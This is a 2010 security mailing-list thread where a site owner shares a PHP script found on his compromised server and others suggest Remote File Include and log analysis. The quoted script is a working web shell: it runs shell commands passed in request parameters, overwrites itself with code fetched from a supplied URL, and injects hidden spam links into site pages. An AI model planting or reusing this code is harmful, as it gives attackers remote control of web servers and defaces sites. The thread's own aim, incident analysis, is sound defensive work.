Thanks all. I googled for "adsttnmq1" earlier and found some stuff. Looking though my logs, I found an IP of a host making a post to one of the URLs in question. Still looking more into what it was doing.
Thanks Adrian On Mon, Mar 1, 2010 at 12:12 PM, Andrew Ellis <[email protected]>wrote: > Historically, I've seen this stuff done through a Remote File Include, > tho I can think of a dozen other ways to get it up on your server. I'd > probably start by digging through the logs looking for someone > including this file in some URL parameter. > > > > On Mon, Mar 1, 2010 at 10:31 AM, Jim Halfpenny <[email protected]> > wrote: > > A search for the string abcdefghiklmnjsweqrtyuiopzx shows other a forum > > thread with some info on this file: > > > > http://www.webhostingtalk.com/showthread.php?t=876121 > > > > I'm sure there are other sources of info out there. Time for some > forensic > > analysis of your logs to work out how and when this got here. I'm > guessing > > an automated attack against a known vuln in a PHP app? > > > > Jim > > > > On 1 March 2010 09:16, Adrian Crenshaw <[email protected]> wrote: > >> > >> Ok, I think one of my sites may have been compromised. I found the > >> following PHP script on a site, but I'm not sure what it is trying to > do. > >> Anyone else ever seen this script before? > >> > >> Adrian > >> > >> <?php > >> ignore_user_abort(1); > >> set_time_limit(0); > >> > >> function Clear() > >> { > >> unlink("c"); > >> unlink("1r"); > >> unlink("log"); > >> } > >> > >> function Clear2() > >> { > >> $mrd = trim(file_get_contents("m")); > >> $pt = "../$mrd"; > >> $fin = file_get_contents($pt); > >> $fin = ereg_replace("<adsttnmq1>(.*)<sdioyslkjs2>", "", $fin); > >> $fin = ereg_replace("<!--dd4-->(.*)<!--dd5-->", "", $fin); > >> $fin = preg_replace('#<a[^>]+\_lm[^>]*>.*?</a>#is', '', $fin); > >> $fin = preg_replace("/http(.*?)tmp6(.*?)\<\/a\>/", "", $fin); > >> $fin = ereg_replace("<!--dd4-->", "", $fin); > >> $fin = ereg_replace("<!--dd5-->", "", $fin); > >> $fin = ereg_replace("<font style=\"position: absolute;overflow: > >> hidden;height: 0;width: 0\">", "", $fin); > >> $fmrd = fopen($pt, "w+"); > >> fwrite($fmrd, $fin); > >> fclose($fmrd); > >> echo " upt-ok"; > >> } > >> > >> function GetVar($name, &$var) > >> { > >> $var = ""; > >> if (isset($_POST[$name])) > >> $var = $_POST[$name]; > >> > >> if (isset($_GET[$name])) > >> $var = $_GET[$name]; > >> > >> if (($var) =="") > >> return false; > >> else return true; > >> } > >> > >> function Gen() > >> { > >> $alp = "abcdefghiklmnjsweqrtyuiopzx"; > >> $maps = array(); > >> if (isset($_POST["sg"])) > >> $sg = $_POST["sg"]; > >> > >> if (isset($_GET["sg"])) > >> $sg = $_GET["sg"]; > >> > >> if (isset($_POST["gm"])) > >> $g = $_POST["gm"]; > >> > >> if (isset($_GET["gm"])) > >> $g = $_GET["gm"]; > >> > >> > >> $path = ""; > >> $fr = fopen("1r", "a+"); > >> if (file_exists("c")) > >> { > >> $fconf = file("c"); > >> $tname = trim($fconf[0]); > >> $cname = trim($fconf[1]); > >> $curs = trim($fconf[2]); > >> $pid = trim($fconf[3]); > >> if ($pid == 100) > >> { > >> $pid = 0; > >> $rnd = mt_rand(0, 999); > >> $nm = ""; > >> for ($i=0; $i<3; $i++) > >> { > >> $ran = mt_rand(0,26); > >> $sym = $alp[$ran]; > >> $nm = $nm.$sym; > >> } > >> $cname = $nm; > >> mkdir("$tname/$cname"); > >> $curs = $g; > >> } > >> } > >> else > >> { > >> $rnd = mt_rand(0, 999); > >> $nm = ""; > >> for ($i=0; $i<5; $i++) > >> { > >> $ran = mt_rand(0,26); > >> $sym = $alp[$ran]; > >> $nm = $nm.$sym; > >> } > >> $tname = $nm; > >> $pid = 0; > >> $curs = $g; > >> mkdir($tname); > >> $fht = fopen("$tname/.htaccess", "w+"); > >> $htname = $sg."2.txt"; > >> $fp = fopen($htname, "r"); > >> $fin = ''; > >> while (!feof($fp)) > >> { > >> $fc = fgets($fp, 1024); > >> if (!$fc) break; > >> $fin .= $fc; > >> } > >> fclose($fp); > >> fwrite($fht, $fin); > >> fclose($fht); > >> $rnd = mt_rand(0, 999); > >> $nm = ""; > >> for ($i=0; $i<3; $i++) > >> { > >> $ran = mt_rand(0,26); > >> $sym = $alp[$ran]; > >> $nm = $nm.$sym; > >> } > >> $cname = $nm; > >> mkdir("$tname/$cname"); > >> } > >> $gname = $sg."sgen.php"; > >> for ($j=$pid; $j<$pid+10; $j++) > >> { > >> $fp = fopen($gname."?g=$curs", "r"); > >> $fin = ''; > >> while (!feof($fp)) > >> { > >> $fc = fgets($fp, 1024); > >> if (!$fc) break; > >> $fin .= $fc; > >> } > >> fclose($fp); > >> > >> $fnd = fopen("$tname/$cname/$curs"."_$j.htm", "w+"); > >> fwrite($fnd, $fin); > >> fclose($fnd); > >> } > >> > >> if ($j==100) > >> { > >> $fp = fopen($gname."?g=$curs&m=1", "r"); > >> $fin = ''; > >> while (!feof($fp)) > >> { > >> $fc = fgets($fp, 1024); > >> if (!$fc) break; > >> $fin .= $fc; > >> } > >> fclose($fp); > >> $fnd = fopen("$tname/$cname/$curs"."_lm.htm", "w+"); > >> fwrite($fnd, $fin); > >> fclose($fnd); > >> $map = "$path/$tname/$cname/$curs"."_lm.htm"; > >> fwrite($fr,"$map\n"); > >> } > >> > >> $fconf = fopen("c", "w+"); > >> fwrite($fconf, $tname."\n"); > >> fwrite($fconf, $cname."\n"); > >> fwrite($fconf, $curs."\n"); > >> $nj = $j; > >> fwrite($fconf, $nj."\n"); > >> fclose($fconf); > >> } > >> > >> function Update() > >> { > >> $thisname = "1.php"; > >> if (isset($_POST['u'])) > >> $u = $_POST['u']; > >> > >> if (isset($_GET['u'])) > >> $u = $_GET['u']; > >> > >> $fp = fopen($u, "r"); > >> $fin = ''; > >> while (!feof($fp)) > >> { > >> $fc = fgets($fp, 1024); > >> if (!$fc) break; > >> $fin .= $fc; > >> } > >> fclose($fp); > >> > >> $fthis = fopen($thisname, "w+"); > >> fwrite($fthis, $fin); > >> fclose($fthis); > >> } > >> > >> function Com() > >> { > >> if (isset($_POST['c'])) > >> @system($_POST['c']); > >> if (isset($_GET['c'])) > >> @system($_GET['c']); > >> } > >> > >> function UpKos() > >> { > >> $mrd = trim(file_get_contents("m")); > >> $pt = "../$mrd"; > >> $fin = file_get_contents($pt); > >> $fin = ereg_replace("adsttnmq1", "<adsttnmq1>", $fin); > >> $fin = ereg_replace("sdioyslkjs2", "<sdioyslkjs2>", $fin); > >> $fmrd = fopen($pt, "w+"); > >> fwrite($fmrd, $fin); > >> fclose($fmrd); > >> } > >> > >> > >> function MRepl() > >> { > >> $mpt = ""; > >> $drs = ""; > >> $begtag = "<adsttnmq1><font style=\"position: absolute;overflow: > >> hidden;height: 0;width: 0\">"; > >> $endtag = "</font></body></html><sdioyslkjs2> "; > >> $mrd = trim(file_get_contents("m")); > >> $pt = "../$mrd"; > >> $fin = file_get_contents($pt); > >> GetVar("mpt", $mpt); > >> // óäàëÿåì çàâåðøàþùèå õòìë òåãè > >> $fin = preg_replace ("/<\/body>/i", "", $fin); > >> $fin = preg_replace ("/<\/html>/i", "", $fin); > >> $fin = ereg_replace("<!--dd4-->(.*)<!--dd5-->", "", $fin); > >> $fin = ereg_replace("<adsttnmq1>(.*)<sdioyslkjs2>", "", $fin); > >> $fp = fopen($mpt, "r"); > >> GetVar("drs", $drs); > >> $fin = $fin.$begtag; > >> $drs = str_replace("\\", "", $drs); > >> $fin = $fin.$drs; > >> $fin = $fin.$endtag; > >> $fmrd = fopen($pt, "w+"); > >> fwrite($fmrd, $fin); > >> fclose($fmrd); > >> } > >> > >> function Main() > >> { > >> if (isset($_POST['u']) || isset($_GET['u'])) > >> { > >> Update(); > >> exit(); > >> } > >> > >> if (isset($_POST['c']) || isset($_GET['c'])) > >> { > >> Com(); > >> exit(); > >> } > >> > >> if (isset($_POST['uk']) || isset($_GET['uk'])) > >> { > >> UpKos(); > >> exit(); > >> } > >> > >> if (isset($_POST['g']) || isset($_GET['g'])) > >> { > >> Gen(); > >> exit(); > >> } > >> > >> if (isset($_POST['s']) || isset($_GET['s'])) > >> { > >> MRepl(); > >> exit(); > >> } > >> > >> if (isset($_POST['cl']) || isset($_GET['cl'])) > >> { > >> Clear(); > >> exit(); > >> } > >> > >> if (isset($_POST['cl2']) || isset($_GET['cl2'])) > >> { > >> Clear2(); > >> exit(); > >> } > >> > >> echo "<ok>"; > >> > >> } > >> > >> Main(); > >> > >> ?> > >> > >> _______________________________________________ > >> Pauldotcom mailing list > >> [email protected] > >> http://mail.pauldotcom.com/cgi-bin/mailman/listinfo/pauldotcom > >> Main Web Site: http://pauldotcom.com > > > > > > _______________________________________________ > > Pauldotcom mailing list > > [email protected] > > http://mail.pauldotcom.com/cgi-bin/mailman/listinfo/pauldotcom > > Main Web Site: http://pauldotcom.com > > > > > > -- > Andrew Ellis > http://blog.psych0tik.net > _______________________________________________ > Pauldotcom mailing list > [email protected] > http://mail.pauldotcom.com/cgi-bin/mailman/listinfo/pauldotcom > Main Web Site: http://pauldotcom.com >
_______________________________________________ Pauldotcom mailing list [email protected] http://mail.pauldotcom.com/cgi-bin/mailman/listinfo/pauldotcom Main Web Site: http://pauldotcom.com
